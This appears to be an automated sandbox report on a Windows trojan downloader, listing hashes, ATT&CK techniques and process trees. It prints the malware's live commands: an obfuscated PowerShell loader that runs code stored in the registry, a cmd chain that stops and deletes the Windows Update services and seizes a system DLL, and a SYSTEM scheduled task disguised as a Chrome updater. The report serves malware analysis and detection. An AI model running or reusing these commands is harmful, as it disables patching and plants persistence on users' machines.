65970760831f083ce65c5ec185f5c1d1c73217bcf600de567f2960b592412c52

Analysis

max time kernel
150s
max time network
46s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
01-09-2022 18:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exe
Size

4.5MB
MD5

b7c12ce33a5c2de80bcd7083d839df6e
SHA1

6d2bce616fc00cafeb2ae4c5499305b36fcfb4f1
SHA256

65970760831f083ce65c5ec185f5c1d1c73217bcf600de567f2960b592412c52
SHA512

b3cbb1c781217aee343352f5ef2668fec9aa70a3f8ed39eafef88815bc4b5a858965d4ea9d30f86e04cdff4d22bef4447333027a56fbc02fc9708203e9987225
SSDEEP

98304:Ha3DFNglg7shj9/X92ZmvG+Hc7supSg8MXGBl3Qbf2jYpvRhzPQA:q23V9/X9pvL+sWKMXGwDEYVx

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description pid process target process

PID 1564 created 420 1564 powershell.EXE winlogon.exe
PID 1656 created 420 1656 powershell.EXE winlogon.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

1684 takeown.exe
760 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

1684 takeown.exe
760 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

3 ip-api.com

description	pid	process	target process
PID 1564 created 420	1564	powershell.EXE	winlogon.exe
PID 1656 created 420	1656	powershell.EXE	winlogon.exe

pid	process
1684	takeown.exe
760	icacls.exe

pid	process
1684	takeown.exe
760	icacls.exe

flow	ioc
3	ip-api.com

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 3 IoCs

Processes:

SecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exepowershell.EXEpowershell.EXE

description	pid	process	target process
PID 1784 set thread context of 1972	1784	SecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exe	conhost.exe
PID 1656 set thread context of 1760	1656	powershell.EXE	dllhost.exe
PID 1564 set thread context of 908	1564	powershell.EXE	dllhost.exe

Drops file in Program Files directory 2 IoCs

Processes:

SecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	SecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	SecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exe

Drops file in Windows directory 6 IoCs

Processes:

svchost.execonhost.exe

description	ioc	process
File opened for modification	C:\Windows\Tasks\dialersvc64.job	svchost.exe
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	svchost.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

632 sc.exe
1320 sc.exe
1896 sc.exe
580 sc.exe
1144 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1540 schtasks.exe

pid	process
632	sc.exe
1320	sc.exe
1896	sc.exe
580	sc.exe
1144	sc.exe

pid	process
1540	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 30902a8e43bed801	powershell.EXE

Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

1876 reg.exe
1748 reg.exe
1564 reg.exe
1628 reg.exe
2000 reg.exe
720 reg.exe
1968 reg.exe
1888 reg.exe
1828 reg.exe

pid	process
1876	reg.exe
1748	reg.exe
1564	reg.exe
1628	reg.exe
2000	reg.exe
720	reg.exe
1968	reg.exe
1888	reg.exe
1828	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeSecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exepowershell.EXEpowershell.EXEdllhost.exedllhost.exe

pid	process
1756	powershell.exe
1784	SecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exe
1564	powershell.EXE
1656	powershell.EXE
1656	powershell.EXE
1564	powershell.EXE
908	dllhost.exe
908	dllhost.exe
1760	dllhost.exe
1760	dllhost.exe
1760	dllhost.exe
1760	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
908	dllhost.exe
1760	dllhost.exe
1760	dllhost.exe
908	dllhost.exe
908	dllhost.exe
1760	dllhost.exe
1760	dllhost.exe
908	dllhost.exe
908	dllhost.exe
1760	dllhost.exe
1760	dllhost.exe
908	dllhost.exe
908	dllhost.exe
1760	dllhost.exe
1760	dllhost.exe
908	dllhost.exe
908	dllhost.exe
1760	dllhost.exe
1760	dllhost.exe
908	dllhost.exe
908	dllhost.exe
1760	dllhost.exe
1760	dllhost.exe
908	dllhost.exe
908	dllhost.exe
1760	dllhost.exe
1760	dllhost.exe
908	dllhost.exe
908	dllhost.exe
1760	dllhost.exe
1760	dllhost.exe
908	dllhost.exe
908	dllhost.exe
1760	dllhost.exe
1760	dllhost.exe
908	dllhost.exe
908	dllhost.exe
1760	dllhost.exe
1760	dllhost.exe
908	dllhost.exe
908	dllhost.exe
1760	dllhost.exe
1760	dllhost.exe
908	dllhost.exe
908	dllhost.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exeSecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exepowercfg.exepowercfg.exetakeown.exepowershell.EXEpowershell.EXEdllhost.exedllhost.exe

description	pid	process
Token: SeDebugPrivilege	1756	powershell.exe
Token: SeShutdownPrivilege	440	powercfg.exe
Token: SeShutdownPrivilege	932	powercfg.exe
Token: SeDebugPrivilege	1784	SecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exe
Token: SeShutdownPrivilege	1116	powercfg.exe
Token: SeShutdownPrivilege	1060	powercfg.exe
Token: SeTakeOwnershipPrivilege	1684	takeown.exe
Token: SeDebugPrivilege	1564	powershell.EXE
Token: SeDebugPrivilege	1656	powershell.EXE
Token: SeDebugPrivilege	1656	powershell.EXE
Token: SeDebugPrivilege	1564	powershell.EXE
Token: SeDebugPrivilege	908	dllhost.exe
Token: SeDebugPrivilege	1760	dllhost.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

svchost.exe

pid process

880 svchost.exe

pid	process
880	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

SecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.execmd.execmd.exe

description	pid	process	target process
PID 1784 wrote to memory of 1756	1784	SecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exe	powershell.exe
PID 1784 wrote to memory of 1756	1784	SecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exe	powershell.exe
PID 1784 wrote to memory of 1756	1784	SecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exe	powershell.exe
PID 1784 wrote to memory of 1344	1784	SecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exe	cmd.exe
PID 1784 wrote to memory of 1344	1784	SecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exe	cmd.exe
PID 1784 wrote to memory of 1344	1784	SecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exe	cmd.exe
PID 1784 wrote to memory of 768	1784	SecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exe	cmd.exe
PID 1784 wrote to memory of 768	1784	SecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exe	cmd.exe
PID 1784 wrote to memory of 768	1784	SecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exe	cmd.exe
PID 1344 wrote to memory of 580	1344	cmd.exe	sc.exe
PID 1344 wrote to memory of 580	1344	cmd.exe	sc.exe
PID 1344 wrote to memory of 580	1344	cmd.exe	sc.exe
PID 1344 wrote to memory of 1144	1344	cmd.exe	sc.exe
PID 1344 wrote to memory of 1144	1344	cmd.exe	sc.exe
PID 1344 wrote to memory of 1144	1344	cmd.exe	sc.exe
PID 768 wrote to memory of 440	768	cmd.exe	powercfg.exe
PID 768 wrote to memory of 440	768	cmd.exe	powercfg.exe
PID 768 wrote to memory of 440	768	cmd.exe	powercfg.exe
PID 1344 wrote to memory of 632	1344	cmd.exe	sc.exe
PID 1344 wrote to memory of 632	1344	cmd.exe	sc.exe
PID 1344 wrote to memory of 632	1344	cmd.exe	sc.exe
PID 1344 wrote to memory of 1320	1344	cmd.exe	sc.exe
PID 1344 wrote to memory of 1320	1344	cmd.exe	sc.exe
PID 1344 wrote to memory of 1320	1344	cmd.exe	sc.exe
PID 768 wrote to memory of 932	768	cmd.exe	powercfg.exe
PID 768 wrote to memory of 932	768	cmd.exe	powercfg.exe
PID 768 wrote to memory of 932	768	cmd.exe	powercfg.exe
PID 1344 wrote to memory of 1896	1344	cmd.exe	sc.exe
PID 1344 wrote to memory of 1896	1344	cmd.exe	sc.exe
PID 1344 wrote to memory of 1896	1344	cmd.exe	sc.exe
PID 1344 wrote to memory of 720	1344	cmd.exe	reg.exe
PID 1344 wrote to memory of 720	1344	cmd.exe	reg.exe
PID 1344 wrote to memory of 720	1344	cmd.exe	reg.exe
PID 768 wrote to memory of 1116	768	cmd.exe	powercfg.exe
PID 768 wrote to memory of 1116	768	cmd.exe	powercfg.exe
PID 768 wrote to memory of 1116	768	cmd.exe	powercfg.exe
PID 1344 wrote to memory of 1876	1344	cmd.exe	reg.exe
PID 1344 wrote to memory of 1876	1344	cmd.exe	reg.exe
PID 1344 wrote to memory of 1876	1344	cmd.exe	reg.exe
PID 1344 wrote to memory of 1828	1344	cmd.exe	reg.exe
PID 1344 wrote to memory of 1828	1344	cmd.exe	reg.exe
PID 1344 wrote to memory of 1828	1344	cmd.exe	reg.exe
PID 768 wrote to memory of 1060	768	cmd.exe	powercfg.exe
PID 768 wrote to memory of 1060	768	cmd.exe	powercfg.exe
PID 768 wrote to memory of 1060	768	cmd.exe	powercfg.exe
PID 1344 wrote to memory of 1748	1344	cmd.exe	reg.exe
PID 1344 wrote to memory of 1748	1344	cmd.exe	reg.exe
PID 1344 wrote to memory of 1748	1344	cmd.exe	reg.exe
PID 1344 wrote to memory of 1968	1344	cmd.exe	reg.exe
PID 1344 wrote to memory of 1968	1344	cmd.exe	reg.exe
PID 1344 wrote to memory of 1968	1344	cmd.exe	reg.exe
PID 1344 wrote to memory of 1684	1344	cmd.exe	takeown.exe
PID 1344 wrote to memory of 1684	1344	cmd.exe	takeown.exe
PID 1344 wrote to memory of 1684	1344	cmd.exe	takeown.exe
PID 1344 wrote to memory of 760	1344	cmd.exe	icacls.exe
PID 1344 wrote to memory of 760	1344	cmd.exe	icacls.exe
PID 1344 wrote to memory of 760	1344	cmd.exe	icacls.exe
PID 1344 wrote to memory of 1564	1344	cmd.exe	reg.exe
PID 1344 wrote to memory of 1564	1344	cmd.exe	reg.exe
PID 1344 wrote to memory of 1564	1344	cmd.exe	reg.exe
PID 1344 wrote to memory of 1628	1344	cmd.exe	reg.exe
PID 1344 wrote to memory of 1628	1344	cmd.exe	reg.exe
PID 1344 wrote to memory of 1628	1344	cmd.exe	reg.exe
PID 1344 wrote to memory of 1888	1344	cmd.exe	reg.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:480

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:464

C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
2⤵
PID:984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
2⤵
PID:1640

C:\Windows\system32\taskhost.exe
"taskhost.exe"
2⤵
PID:1124

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
2⤵
PID:1088

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
2⤵
PID:1028

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
2⤵
PID:364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
2⤵
- Drops file in Windows directory
- Suspicious use of UnmapMainImage
PID:880

C:\Windows\system32\taskeng.exe
taskeng.exe {52E68164-B34A-4866-9E3F-1C450FC140F7} S-1-5-18:NT AUTHORITY\System:Service:
3⤵
PID:1160

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
2⤵
PID:856

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
2⤵
PID:812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
2⤵
PID:748

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
2⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
2⤵
PID:596

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:420

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{b3b99065-07ff-4e06-b672-dcbae627ad64}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:908

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{651cd51c-84b2-4154-b889-9017e28a429a}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1760

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:488

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1176

\\?\C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
1⤵
PID:1668

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1220

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exe"
2⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAYgByAGwAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBtAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbwB4AGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBpAHcAdwAjAD4A"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1756

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:1344

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:580

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:1144

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:632

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:1320

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:1896

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:720

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:1876

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:1828

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:1748

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:1968

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1684

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:760

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1564

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1628

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1888

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:2000

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:1244

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:1052

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:1660

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:1596

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:1620

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:1608

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1916

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:768

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:440

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:932

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1116

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1060

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
3⤵
- Drops file in Windows directory
PID:1972

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
3⤵
PID:1416

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
4⤵
- Creates scheduled task(s)
PID:1540

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
3⤵
PID:300

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
4⤵
PID:1812

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\Tasks\dialersvc32.job
Filesize
1KB

MD5
8254a9bb07747303054f8ebc2e96d79f

SHA1
e45888401dfd7f5dfa1fc3706a8bdb040a220470

SHA256
d0332ed7303bfb55ba5581085669c182350780eb4311db643000c5ca8fab56e9

SHA512
1ffebb22d78d6a33cc4b41da2bcb8b57c75d568b8d54a9abc10a68e44b3e8cd2a4da82ffc45d22b9752b3a6b2989f8a08ac0f51d861078803f30a5362cabe08d

Download Submit
C:\Windows\Tasks\dialersvc64.job
Filesize
1KB

MD5
556adc73a74e53baa9e2fef3ed4b1e8c

SHA1
445694272868b1b78c53e680c87cd5d7f9c95f82

SHA256
fc25e34ffc802d041427ec2ceced953c058c6ecc1a0fa7fdc4d85c5a90908c14

SHA512
520b8ffaba1e41f1a3274070d6600024f02a57e07d9a7c83f963442c22fbd76d2827954e0f14f163bc9578c4f6e09182dedc3f19f01bafd6a524c6cb4b441bb8

Download Submit
memory/300-112-0x0000000000000000-mapping.dmp

Download
memory/364-251-0x0000000000A20000-0x0000000000A4A000-memory.dmp

Filesize
168KB

Download
memory/364-252-0x00000000371C0000-0x00000000371D0000-memory.dmp

Filesize
64KB

Download
memory/420-155-0x0000000000730000-0x0000000000753000-memory.dmp

Filesize
140KB

Download
memory/420-156-0x00000000007F0000-0x000000000081A000-memory.dmp

Filesize
168KB

Download
memory/420-145-0x000007FEBEB10000-0x000007FEBEB20000-memory.dmp

Filesize
64KB

Download
memory/420-146-0x00000000371C0000-0x00000000371D0000-memory.dmp

Filesize
64KB

Download
memory/420-142-0x0000000000730000-0x0000000000753000-memory.dmp

Filesize
140KB

Download
memory/440-67-0x0000000000000000-mapping.dmp

Download
memory/464-152-0x00000000371C0000-0x00000000371D0000-memory.dmp

Filesize
64KB

Download
memory/464-163-0x0000000000810000-0x000000000083A000-memory.dmp

Filesize
168KB

Download
memory/464-149-0x000007FEBEB10000-0x000007FEBEB20000-memory.dmp

Filesize
64KB

Download
memory/480-177-0x00000000000A0000-0x00000000000CA000-memory.dmp

Filesize
168KB

Download
